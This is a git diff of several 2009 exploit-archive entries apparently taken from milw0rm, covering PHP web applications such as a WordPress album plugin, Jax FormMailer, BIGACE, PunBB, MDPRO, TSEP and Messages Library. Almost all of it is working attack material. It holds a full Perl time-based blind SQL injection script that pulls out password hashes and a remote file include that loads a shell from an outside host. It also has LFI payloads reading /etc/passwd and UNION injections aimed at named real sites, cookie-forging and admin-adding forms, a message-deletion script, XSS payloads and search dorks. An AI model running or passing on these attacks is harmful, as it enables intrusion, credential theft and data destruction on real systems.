+############################################################################################# +[+] Xpl : +[+] http://[sitename]/[path]//wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/wp-content/plugins/dm-albums/ +############################################################################################# + +# milw0rm.com [2009-06-30] diff --git a/platforms/php/webapps/9049.txt b/platforms/php/webapps/9049.txt index c1c2d3f12..2a353ca94 100755 --- a/platforms/php/webapps/9049.txt +++ b/platforms/php/webapps/9049.txt 
@@ -1,11 +1,11 @@ -############################################################################################# -[+] DM FileManager 3.9.4 Remote File Dislosure Vulnerability -[+] Author : Stack -[+] Greetz : V4 Team & Sec R1z -[+] Download Script : http://www.dutchmonkey.com/?file=products/dm-filemanager/download_response.html&download=direct -############################################################################################# -[+] Xpl : -[+] http://[sitename]/[path]/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/dm-albums/ -############################################################################################# - -# milw0rm.com [2009-06-30] +############################################################################################# +[+] DM FileManager 3.9.4 Remote File Dislosure Vulnerability +[+] Author : Stack +[+] Greetz : V4 Team & Sec R1z +[+] Download Script : http://www.dutchmonkey.com/?file=products/dm-filemanager/download_response.html&download=direct +############################################################################################# +[+] Xpl : +[+] http://[sitename]/[path]/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/dm-albums/ +############################################################################################# + +# milw0rm.com [2009-06-30] diff --git a/platforms/php/webapps/9051.txt b/platforms/php/webapps/9051.txt index e99dd0ede..42e4f5d5b 100755 --- a/platforms/php/webapps/9051.txt +++ b/platforms/php/webapps/9051.txt 
@@ -1,21 +1,21 @@ - --:remote file include:-- ---------------------------------- -script:Jax FormMailer 3.0.0 -Release:01.06.2008 -- -Author: ahmadbady - ------------------------------------------------------------------------ -download from:http://www.jtr.de/scripting/php/formmailer/index_eng.html - ------------------------------------------------------------------------ -dork:intitle:"Jax Formmailer - Administration" -------------------------------------------- -------------------------------------------- -xpl: - -/path/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://site.com/shell.txt? - -******************************************* - -# milw0rm.com [2009-06-30] + --:remote file include:-- +--------------------------------- +script:Jax FormMailer 3.0.0 +Release:01.06.2008 +- +Author: ahmadbady + +----------------------------------------------------------------------- +download from:http://www.jtr.de/scripting/php/formmailer/index_eng.html + +----------------------------------------------------------------------- +dork:intitle:"Jax Formmailer - Administration" +------------------------------------------- +------------------------------------------- +xpl: + +/path/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://site.com/shell.txt? + +******************************************* + +# milw0rm.com [2009-06-30] diff --git a/platforms/php/webapps/9052.txt b/platforms/php/webapps/9052.txt index 34545fd41..2c103e9fc 100755 --- a/platforms/php/webapps/9052.txt +++ b/platforms/php/webapps/9052.txt 
@@ -1,24 +1,24 @@ ------------------:LFI:---------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- -script : BIGACE 2.6 - -download : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip - -Author : CWD@rBe - -Special Thanks : www.cyber-warrior.org - -*************************************************************************************************************** -exploit: - -http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len - -example sites - -1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len - -2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len - -**************************************************************************************************************** - -# milw0rm.com [2009-06-30] +-----------------:LFI:---------------------------------------------------------------------------------------- +--------------------------------------------------------------------------------------------------------------- +script : BIGACE 2.6 + +download : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip + +Author : CWD@rBe + +Special Thanks : www.cyber-warrior.org + +*************************************************************************************************************** +exploit: + +http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len + +example sites + +1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len + +2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len + +**************************************************************************************************************** + +# milw0rm.com 
[2009-06-30] diff --git a/platforms/php/webapps/9053.txt b/platforms/php/webapps/9053.txt index 117d62f98..998eacf0d 100755 --- a/platforms/php/webapps/9053.txt +++ b/platforms/php/webapps/9053.txt 
@@ -1,35 +1,35 @@ -################################################################################################################ -[+] phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability -[+] Discovered By SirGod -[+] http://insecurity-ro.org -[+] http://h4cky0u.org -################################################################################################################# - -[+] Download Script : -http://sourceforge.net/project/showfiles.php?group_id=116966&package_id=152150&release_id=326884 - -[+] Insecure Cookie Handling - - - Vulnerable code in admin.php - -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -if ($_COOKIE[PHPMYBCAdmin] == '') { -if (!$_POST[login] == 'login') { -die("Please Login:<BR><form method=post><input type=password -name=password><input type=hidden value=login name=login><input -type=submit></form>"); -} elseif($_POST[password] == $bcadminpass) { -setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60); -header("Location: admin.php"); } else { die("Incorrect"); } -} -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - - - PoC - - javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/"; -document.cookie = "1246371700; path=/"; - - -################################################################################################################# - -# milw0rm.com [2009-06-30] +################################################################################################################ +[+] phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability +[+] Discovered By SirGod +[+] http://insecurity-ro.org +[+] http://h4cky0u.org 
+################################################################################################################# + +[+] Download Script : +http://sourceforge.net/project/showfiles.php?group_id=116966&package_id=152150&release_id=326884 + +[+] Insecure Cookie Handling + + - Vulnerable code in admin.php + +------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +if ($_COOKIE[PHPMYBCAdmin] == '') { +if (!$_POST[login] == 'login') { +die("Please Login:<BR><form method=post><input type=password +name=password><input type=hidden value=login name=login><input +type=submit></form>"); +} elseif($_POST[password] == $bcadminpass) { +setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60); +header("Location: admin.php"); } else { die("Incorrect"); } +} +------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + + - PoC + + javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/"; +document.cookie = "1246371700; path=/"; + + +################################################################################################################# + +# milw0rm.com [2009-06-30] diff --git a/platforms/php/webapps/9055.pl b/platforms/php/webapps/9055.pl index 359b9f6b9..e6f84814a 100755 --- a/platforms/php/webapps/9055.pl +++ b/platforms/php/webapps/9055.pl 
@@ -1,110 +1,110 @@ -#!/usr/bin/perl -#[0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit -#Coded By Dante90, WaRWolFz Crew -#Bug Discovered By: Dante90 & UltraSound, WaRWolFz Crew -#Product: http://www.punres.org/desc.php?pid=328 - -use strict; -use LWP::UserAgent; - -use HTTP::Request::Common; -use Time::HiRes; -use IO::Socket; - -my ($Hash,$Time,$Time_Start,$Time_End,$Response); -my($Start,$End); -my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); -my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link -my $id = shift or &usage; -my $Method = HTTP::Request->new(GET => $Host); -my $HTTP = new LWP::UserAgent; -my $Referrer = "http://warwolfz.altervista.org/"; -my $DefaultTime = request($Referrer); - -sub Blind_SQL_Jnjection{ - my ($dec,$hex) = @_; - return "./affiliates.php?out=-1+OR+1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${id})/*"; -} - -for(my $I=1; $I<=40; $I++){ #N Hash characters - for(my $J=0; $J<=15; $J++){ #0 -> F - $Time_Start = time(); - $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J])); - $Time_End = time(); - $Time = request($Referrer); - refresh($Host, $DefaultTime, $J, $Hash, $Time, $I); - if($Time_End - $Time_Start > 6){ - $Time = request($Referrer); - refresh($Host, $DefaultTime, $J, $Hash, $Time, $I); - if($Time_End - $Time_Start > 6){ - syswrite(STDOUT,chr($chars[$J])); - $Hash .= chr($chars[$J]); - $Time = request($Referrer); - refresh($Host, $DefaultTime, $J, $Hash, $Time, $I); - last; - } - } - } - if($I == 1 && length $Hash < 0 && !$Hash){ - print " * Exploit Failed *\n"; - print " ------------------------------------------------------ \n"; - exit; - } - if($I == 40){ - print " * Exploit Successed *\n"; - print " ------------------------------------------------------\n "; - system("pause"); - } -} - -sub usage{ - system("cls"); - { - print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 
Remote Blind SQL Injection Exploit\n"; - print " ------------------------------------------------------ \n"; - print " * USAGE: *\n"; - print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; - print " * perl name_exploit.pl [id] *\n"; - print " ------------------------------------------------------ \n"; - print " * Powered By Dante90, WaRWolFz Crew *\n"; - print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; - print " ------------------------------------------------------ \n"; - }; - exit; -} - -sub request{ - $Referrer = $_[0]; - $Method->referrer($Referrer); - $Start = Time::HiRes::time(); - $Response = $HTTP->request($Method); - $Response->is_success() or die "$Host : ", $Response->message,"\n"; - $End = Time::HiRes::time(); - $Time = $End - $Start; - return $Time; -} - -sub refresh{ - system("cls"); - { - print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n"; - print " ------------------------------------------------------ \n"; - print " * USAGE: *\n"; - print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; - print " * perl name_exploit.pl [uid] *\n"; - print " ------------------------------------------------------ \n"; - print " * Powered By Dante90, WaRWolFz Crew *\n"; - print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; - print " ------------------------------------------------------ \n"; - }; - print " * Victime Site: " . $_[0] . "\n"; - print " * Default Time: " . $_[1] . " seconds\n"; - print " * BruteForcing Hash: " . chr($chars[$_[2]]) . "\n"; - print " * BruteForcing N Char Hash: " . $_[5] . "\n"; - print " * SQL Time: " . $_[4] . " seconds\n"; - print " * Hash: " . $_[3] . 
"\n"; -} - -#WaRWolFz Crew - -# milw0rm.com [2009-06-30] +#!/usr/bin/perl +#[0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit +#Coded By Dante90, WaRWolFz Crew +#Bug Discovered By: Dante90 & UltraSound, WaRWolFz Crew +#Product: http://www.punres.org/desc.php?pid=328 + +use strict; +use LWP::UserAgent; + +use HTTP::Request::Common; +use Time::HiRes; +use IO::Socket; + +my ($Hash,$Time,$Time_Start,$Time_End,$Response); +my($Start,$End); +my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); +my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link +my $id = shift or &usage; +my $Method = HTTP::Request->new(GET => $Host); +my $HTTP = new LWP::UserAgent; +my $Referrer = "http://warwolfz.altervista.org/"; +my $DefaultTime = request($Referrer); + +sub Blind_SQL_Jnjection{ + my ($dec,$hex) = @_; + return "./affiliates.php?out=-1+OR+1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${id})/*"; +} + +for(my $I=1; $I<=40; $I++){ #N Hash characters + for(my $J=0; $J<=15; $J++){ #0 -> F + $Time_Start = time(); + $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J])); + $Time_End = time(); + $Time = request($Referrer); + refresh($Host, $DefaultTime, $J, $Hash, $Time, $I); + if($Time_End - $Time_Start > 6){ + $Time = request($Referrer); + refresh($Host, $DefaultTime, $J, $Hash, $Time, $I); + if($Time_End - $Time_Start > 6){ + syswrite(STDOUT,chr($chars[$J])); + $Hash .= chr($chars[$J]); + $Time = request($Referrer); + refresh($Host, $DefaultTime, $J, $Hash, $Time, $I); + last; + } + } + } + if($I == 1 && length $Hash < 0 && !$Hash){ + print " * Exploit Failed *\n"; + print " ------------------------------------------------------ \n"; + exit; + } + if($I == 40){ + print " * Exploit Successed *\n"; + print " ------------------------------------------------------\n "; + system("pause"); + } +} + +sub usage{ + system("cls"); + { + print " \n [0-Day] PunBB 
Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n"; + print " ------------------------------------------------------ \n"; + print " * USAGE: *\n"; + print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; + print " * perl name_exploit.pl [id] *\n"; + print " ------------------------------------------------------ \n"; + print " * Powered By Dante90, WaRWolFz Crew *\n"; + print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; + print " ------------------------------------------------------ \n"; + }; + exit; +} + +sub request{ + $Referrer = $_[0]; + $Method->referrer($Referrer); + $Start = Time::HiRes::time(); + $Response = $HTTP->request($Method); + $Response->is_success() or die "$Host : ", $Response->message,"\n"; + $End = Time::HiRes::time(); + $Time = $End - $Start; + return $Time; +} + +sub refresh{ + system("cls"); + { + print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n"; + print " ------------------------------------------------------ \n"; + print " * USAGE: *\n"; + print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; + print " * perl name_exploit.pl [uid] *\n"; + print " ------------------------------------------------------ \n"; + print " * Powered By Dante90, WaRWolFz Crew *\n"; + print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; + print " ------------------------------------------------------ \n"; + }; + print " * Victime Site: " . $_[0] . "\n"; + print " * Default Time: " . $_[1] . " seconds\n"; + print " * BruteForcing Hash: " . chr($chars[$_[2]]) . "\n"; + print " * BruteForcing N Char Hash: " . $_[5] . "\n"; + print " * SQL Time: " . $_[4] . " seconds\n"; + print " * Hash: " . $_[3] . "\n"; +} + +#WaRWolFz Crew + +# milw0rm.com [2009-06-30] diff --git a/platforms/php/webapps/9056.txt b/platforms/php/webapps/9056.txt index 1c7f8cea1..e75757895 100755 --- a/platforms/php/webapps/9056.txt +++ b/platforms/php/webapps/9056.txt 
@@ -1,21 +1,21 @@ -###################################################################################### -# # -# Author: Dante90, WaRWolFz Crew # -# Title: [0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By Dante90 # -# MSN: dante90.dmc4@hotmail.it # -# Web: www.warwolfz.org # -# # -###################################################################################### - -[0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By Dante90 - -[code] -http://www.victime_site.org/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2-- -[/code] - -Example: -[code] -http://www.lacinium.com/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2-- -[/code] - -# milw0rm.com [2009-06-30] +###################################################################################### +# # +# Author: Dante90, WaRWolFz Crew # +# Title: [0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By Dante90 # +# MSN: dante90.dmc4@hotmail.it # +# Web: www.warwolfz.org # +# # +###################################################################################### + +[0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By Dante90 + +[code] +http://www.victime_site.org/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2-- +[/code] + +Example: +[code] +http://www.lacinium.com/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2-- +[/code] + +# milw0rm.com [2009-06-30] diff --git a/platforms/php/webapps/9057.txt b/platforms/php/webapps/9057.txt index 9ec98ab17..dfe22a2dc 100755 --- a/platforms/php/webapps/9057.txt +++ b/platforms/php/webapps/9057.txt 
@@ -1,207 +1,207 @@ -TSEP <=0.942.02 Vulnerabilities -http://tsep.sourceforge.net - -Dork: "powered by TSEP - The Search Engine Project" - -(c)eLwaux 30.06.2009, uasc.org.ua - - -## ## ## ## ## ## - -Blind SQL-Inj -/admin/rankform.php - ------------------------------------------------------------------------------ -23: // Delete the contents -24: if ((isset ($_POST["delete"])) && (isset ($_POST["deleteRank"]))) { -25: $percent = $_POST['deleteRank']; -26: $sql_del = "DELETE FROM $db_tablename WHERE valuepercent='$percent'"; -27: -28: mysql_query($sql_del); -29: } ------------------------------------------------------------------------------ - -exploit (BlindSQLinj after DELETE): -POST: delete = . -POST: deleteRank = '{SQL}-- - -exploit2 (BlindSQLinj after UPDATE): -POST: modify = . -POST: modifyRank = . -POST: display = . -POST: comment = . -POST: alt = . -POST: percent = '{SQL}-- - - - - -## ## ## ## ## ## - -SQL-Inj -/admin/rankform.php - ------------------------------------------------------------------------------ -54: if ((isset ($_POST["insert"])) && (isset ($_POST["insertNewRank"]))) { -55: $alt = $_POST['alt']; -56: $image_show = $_POST['image_show']; -57: $comment = $_POST['comment']; -58: $percent = $_POST['percent']; -59: $display = reslash($_POST['display']); -60: -61: if (($percent > "0") && ($percent <= "100")) { -62: $sql_ins = "INSERT INTO $db_tablename (alt_tag,display,valuepercent,image_show,comment) -63: VALUES ('$alt','$display','$percent','$image_show','$comment')"; -64: mysql_query($sql_ins); -65: } -66: $sql_upd = "UPDATE $db_tablename SET image_show='$image_show'"; -67: mysql_query($sql_upd); -68: -69: } ------------------------------------------------------------------------------ - -exploit: -POST: insertNewRank = . -POST: insert = . 
-POST: percent = 1 -POST: alt = 1',( select concat_ws(0x3a,username,passwd,email,question,answer) from tsep_users ),1,1,1);-- -POST: image_show = 1 -POST: comment = 1 -POST: display = 1 -then goto /admin/rankform.php and look admin name & passwd & email & question and answer - - - -## ## ## ## ## ## - -LFI -/admin/index.php - ------------------------------------------------------------------------------ -335: if ( isset( $_POST ) and count( $_POST ) > 0 ) { -336: $_GET = $_POST; -337: } -338: if ( !isset($_GET["lang"]) ) -339: if ( !isset($_SESSION["lang"]) ) -340: $_GET["lang"] = "en_US"; -341: else -342: $_GET["lang"] = $_SESSION["lang"]; -345: if ( $_GET["lang"] != "en_US" ) -345: require_once( "../language/" . $_GET["lang"] . "/language.php" ); ------------------------------------------------------------------------------ - -exploit: -GET: /admin/?lang=../{FILE.PHP}%00 - - - - - -## ## ## ## ## ## - -Blind SQL-inj -/admin/indexoverview.php - ------------------------------------------------------------------------------ -29: if (isset($_GET['order'])) // for userdefined search order, otherwise sort by time of entry: Title ASC -30: { // write new values -31: $db_tablename = $db_table_prefix."internal"; -32: $query = "UPDATE $db_tablename SET stringvalue='".$_GET['order']."' WHERE description='tsepindexovervieworder'"; -33: $result = mysql_query($query, $tsepdbconnection) or die(mysql_error()); -34: $query = "UPDATE $db_tablename SET stringvalue='".$_GET['dir']."' WHERE description='tsepindexoverviewdirection'"; -35: $result = mysql_query($query, $tsepdbconnection) or die(mysql_error()); -36: } ------------------------------------------------------------------------------ - -exploit: -GET: order = '+and+1=if(select+ascii(lower(substring(passwd,1,1)))>90+from+tsep_users+where+username='adminame',1,0)-- - - - - - -## ## ## ## ## ## - -XSS -/admin/configuration.php - ------------------------------------------------------------------------------ -137: <form 
name="tsepconfig" id="tsepconfig" method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> -154: <form name="frmMaxResultNew" id="frmMaxResultNew" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> -164: <form name="frmMaxR....ckForm" id="frmMaxResult" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> ------------------------------------------------------------------------------ - -exploit: -GET: /configuration.php/"><script>alert(/xss/);</script><a%20" - - - -## ## ## ## ## ## - -XSS -/admin/index.php - ------------------------------------------------------------------------------ -97: if ( isset( $_GET["errorMsg"] ) ) { -100: $html .= " <td class=\"errorMessage\">".addslashes( $_GET["errorMsg"] )."</td>\n"; -107: unset( $_GET["errorMsg"] ); -108: } ------------------------------------------------------------------------------ - -exploit: -GET: /admin/?errorMsg=<script>alert(/xss/);</script> - - - - -## ## ## ## ## ## - -Path disk: ------------------------------------------------------------------------------ -/admin/examples/phpcrawl4tsep.php -/admin/examples/fillwithcontent.php -/admin/examples/urllist.php -/include/indexingtimetaken.php -/include/timeneeded.php -/include/colorcycle.php -/include/dbconnection.php -/include/resultnumber.php -/include/copyright.php -/include/notifyofstopwords.php -/inclued/oldmysqltell.php -/include/indexstatus.php -/include/pagenavigation.php -/include/searchterm.php -/include/stampittimestamp.php -/include/ranking.php -/include/ipfunctions.php -/include/indexer_search_table.php -/include/printpagedetails.php -/include/deletefile.php -/include/uploadfile.php -/include/configfunctions.php ------------------------------------------------------------------------------ - - - - - -## ## ## ## ## ## - -PHPINFO: ------------------------------------------------------------------------------ -/admin/tsepinfo.php ------------------------------------------------------------------------------ - - - - -## ## ## ## ## ## 
- -others's exploits: -/admin/configcontentimages.php/">{XSS}<" -/include/indexer_search_table.php?tsep_lng[help_copyright]=">{XSS}<" -/tsepsearch.php?q=sa&s=0&e=10&user_e=10/">{XSS}<a" -/tsepsearch.php?q={XSS}&s=0&e=10/&user_e=10 - -# milw0rm.com [2009-06-30] +TSEP <=0.942.02 Vulnerabilities +http://tsep.sourceforge.net + +Dork: "powered by TSEP - The Search Engine Project" + +(c)eLwaux 30.06.2009, uasc.org.ua + + +## ## ## ## ## ## + +Blind SQL-Inj +/admin/rankform.php + +----------------------------------------------------------------------------- +23: // Delete the contents +24: if ((isset ($_POST["delete"])) && (isset ($_POST["deleteRank"]))) { +25: $percent = $_POST['deleteRank']; +26: $sql_del = "DELETE FROM $db_tablename WHERE valuepercent='$percent'"; +27: +28: mysql_query($sql_del); +29: } +----------------------------------------------------------------------------- + +exploit (BlindSQLinj after DELETE): +POST: delete = . +POST: deleteRank = '{SQL}-- + +exploit2 (BlindSQLinj after UPDATE): +POST: modify = . +POST: modifyRank = . +POST: display = . +POST: comment = . +POST: alt = . 
+POST: percent = '{SQL}-- + + + + +## ## ## ## ## ## + +SQL-Inj +/admin/rankform.php + +----------------------------------------------------------------------------- +54: if ((isset ($_POST["insert"])) && (isset ($_POST["insertNewRank"]))) { +55: $alt = $_POST['alt']; +56: $image_show = $_POST['image_show']; +57: $comment = $_POST['comment']; +58: $percent = $_POST['percent']; +59: $display = reslash($_POST['display']); +60: +61: if (($percent > "0") && ($percent <= "100")) { +62: $sql_ins = "INSERT INTO $db_tablename (alt_tag,display,valuepercent,image_show,comment) +63: VALUES ('$alt','$display','$percent','$image_show','$comment')"; +64: mysql_query($sql_ins); +65: } +66: $sql_upd = "UPDATE $db_tablename SET image_show='$image_show'"; +67: mysql_query($sql_upd); +68: +69: } +----------------------------------------------------------------------------- + +exploit: +POST: insertNewRank = . +POST: insert = . +POST: percent = 1 +POST: alt = 1',( select concat_ws(0x3a,username,passwd,email,question,answer) from tsep_users ),1,1,1);-- +POST: image_show = 1 +POST: comment = 1 +POST: display = 1 +then goto /admin/rankform.php and look admin name & passwd & email & question and answer + + + +## ## ## ## ## ## + +LFI +/admin/index.php + +----------------------------------------------------------------------------- +335: if ( isset( $_POST ) and count( $_POST ) > 0 ) { +336: $_GET = $_POST; +337: } +338: if ( !isset($_GET["lang"]) ) +339: if ( !isset($_SESSION["lang"]) ) +340: $_GET["lang"] = "en_US"; +341: else +342: $_GET["lang"] = $_SESSION["lang"]; +345: if ( $_GET["lang"] != "en_US" ) +345: require_once( "../language/" . $_GET["lang"] . 
"/language.php" ); +----------------------------------------------------------------------------- + +exploit: +GET: /admin/?lang=../{FILE.PHP}%00 + + + + + +## ## ## ## ## ## + +Blind SQL-inj +/admin/indexoverview.php + +----------------------------------------------------------------------------- +29: if (isset($_GET['order'])) // for userdefined search order, otherwise sort by time of entry: Title ASC +30: { // write new values +31: $db_tablename = $db_table_prefix."internal"; +32: $query = "UPDATE $db_tablename SET stringvalue='".$_GET['order']."' WHERE description='tsepindexovervieworder'"; +33: $result = mysql_query($query, $tsepdbconnection) or die(mysql_error()); +34: $query = "UPDATE $db_tablename SET stringvalue='".$_GET['dir']."' WHERE description='tsepindexoverviewdirection'"; +35: $result = mysql_query($query, $tsepdbconnection) or die(mysql_error()); +36: } +----------------------------------------------------------------------------- + +exploit: +GET: order = '+and+1=if(select+ascii(lower(substring(passwd,1,1)))>90+from+tsep_users+where+username='adminame',1,0)-- + + + + + +## ## ## ## ## ## + +XSS +/admin/configuration.php + +----------------------------------------------------------------------------- +137: <form name="tsepconfig" id="tsepconfig" method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> +154: <form name="frmMaxResultNew" id="frmMaxResultNew" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> +164: <form name="frmMaxR....ckForm" id="frmMaxResult" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> +----------------------------------------------------------------------------- + +exploit: +GET: /configuration.php/"><script>alert(/xss/);</script><a%20" + + + +## ## ## ## ## ## + +XSS +/admin/index.php + +----------------------------------------------------------------------------- +97: if ( isset( $_GET["errorMsg"] ) ) { +100: $html .= " <td class=\"errorMessage\">".addslashes( $_GET["errorMsg"] )."</td>\n"; +107: 
unset( $_GET["errorMsg"] ); +108: } +----------------------------------------------------------------------------- + +exploit: +GET: /admin/?errorMsg=<script>alert(/xss/);</script> + + + + +## ## ## ## ## ## + +Path disk: +----------------------------------------------------------------------------- +/admin/examples/phpcrawl4tsep.php +/admin/examples/fillwithcontent.php +/admin/examples/urllist.php +/include/indexingtimetaken.php +/include/timeneeded.php +/include/colorcycle.php +/include/dbconnection.php +/include/resultnumber.php +/include/copyright.php +/include/notifyofstopwords.php +/inclued/oldmysqltell.php +/include/indexstatus.php +/include/pagenavigation.php +/include/searchterm.php +/include/stampittimestamp.php +/include/ranking.php +/include/ipfunctions.php +/include/indexer_search_table.php +/include/printpagedetails.php +/include/deletefile.php +/include/uploadfile.php +/include/configfunctions.php +----------------------------------------------------------------------------- + + + + + +## ## ## ## ## ## + +PHPINFO: +----------------------------------------------------------------------------- +/admin/tsepinfo.php +----------------------------------------------------------------------------- + + + + +## ## ## ## ## ## + +others's exploits: +/admin/configcontentimages.php/">{XSS}<" +/include/indexer_search_table.php?tsep_lng[help_copyright]=">{XSS}<" +/tsepsearch.php?q=sa&s=0&e=10&user_e=10/">{XSS}<a" +/tsepsearch.php?q={XSS}&s=0&e=10/&user_e=10 + +# milw0rm.com [2009-06-30] diff --git a/platforms/php/webapps/9059.htm b/platforms/php/webapps/9059.htm index 69e90593f..0d62763e1 100755 --- a/platforms/php/webapps/9059.htm +++ b/platforms/php/webapps/9059.htm @@ -1,22 +1,22 @@ -<head> -<title>ThE g0bL!N Messages Library 2.0 Remote Add Admintsrator Account - - - -
    - - - - - - - - - -
    Username 
    Password 
    -

    -
    - - - -# milw0rm.com [2009-06-30] + +ThE g0bL!N Messages Library 2.0 Remote Add Admintsrator Account + + + +
    + + + + + + + + + +
    Username 
    Password 
    +

    +
    + + + +# milw0rm.com [2009-06-30] diff --git a/platforms/php/webapps/9062.txt b/platforms/php/webapps/9062.txt index 80e7f7ef7..2c95fc8ca 100755 --- a/platforms/php/webapps/9062.txt +++ b/platforms/php/webapps/9062.txt 
@@ -1,21 +1,21 @@ -#!/usr/bin/perl -w -# Messages Library 2.0 <= Arbitrary Delete Message -######################################## -#[*] Founded & Exploited by : Stack -######################################## -print "\t\t############################################################\n\n"; -print "\t\t# Messages Library 2.0 <= Arbitrary Delete Message #\n\n"; -print "\t\t# by Stack #\n\n"; -print "\t\t############################################################\n\n"; -use LWP::UserAgent; -die "Example: perl $0 http://victim.com/path/\n" unless @ARGV; -print "\n[!] ContactID : "; -chomp(my $id=); -$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); -$host = $ARGV[0] . "/admin/sms.php?Action=Delete&ID=".$id.""; -$res = $b->request(HTTP::Request->new(POST=>$host)); - print "\nBrought to you by v4-team.com...\n"; - print "\n[+] Message Deleted \n"; - -# milw0rm.com [2009-07-01] +#!/usr/bin/perl -w +# Messages Library 2.0 <= Arbitrary Delete Message +######################################## +#[*] Founded & Exploited by : Stack +######################################## +print "\t\t############################################################\n\n"; +print "\t\t# Messages Library 2.0 <= Arbitrary Delete Message #\n\n"; +print "\t\t# by Stack #\n\n"; +print "\t\t############################################################\n\n"; +use LWP::UserAgent; +die "Example: perl $0 http://victim.com/path/\n" unless @ARGV; +print "\n[!] ContactID : "; +chomp(my $id=); +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); +$host = $ARGV[0] . "/admin/sms.php?Action=Delete&ID=".$id.""; +$res = $b->request(HTTP::Request->new(POST=>$host)); + print "\nBrought to you by v4-team.com...\n"; + print "\n[+] Message Deleted \n"; + +# milw0rm.com [2009-07-01] 
